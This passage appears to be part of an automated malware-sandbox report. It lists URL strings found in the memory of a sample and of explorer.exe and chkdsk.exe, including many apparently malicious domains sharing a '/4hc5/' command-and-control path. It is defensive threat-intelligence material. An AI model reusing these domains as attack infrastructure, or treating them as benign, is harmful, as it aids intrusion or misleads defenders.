          Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
          Source: explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421243113.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106023617.0000000009843000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1650112973.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1652947131.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4093617722.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7141999.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7141999.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7141999.com/4hc5/www.pacersun.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7141999.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.3105919399.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105163433.000000000C999000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105077677.000000000C970000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bollywood.nexus
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bollywood.nexus/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bollywood.nexus/4hc5/www.lpqxmz.site
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bollywood.nexusReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.candicrem.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.candicrem.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.candicrem.com/4hc5/www.therenixgroupllc.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.candicrem.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.castlegrouplt.com
          Source: explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.castlegrouplt.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.castlegrouplt.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.com/4hc5/www.candicrem.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqixuehe.comReferer:
          Source: 881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.site/4hc5/www.tcbbuilds.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lpqxmz.siteReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modluxenwa.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modluxenwa.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modluxenwa.com/4hc5/www.vurporn.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modluxenwa.comReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motionmixmedia.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motionmixmedia.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motionmixmedia.com/4hc5/www.castlegrouplt.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motionmixmedia.comReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pacersun.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pacersun.com/4hc5/
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pacersun.com/4hc5/www.showshoe.info
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pacersun.comReferer:
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com
          Source: explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.quailrun-inc.com/4hc5/
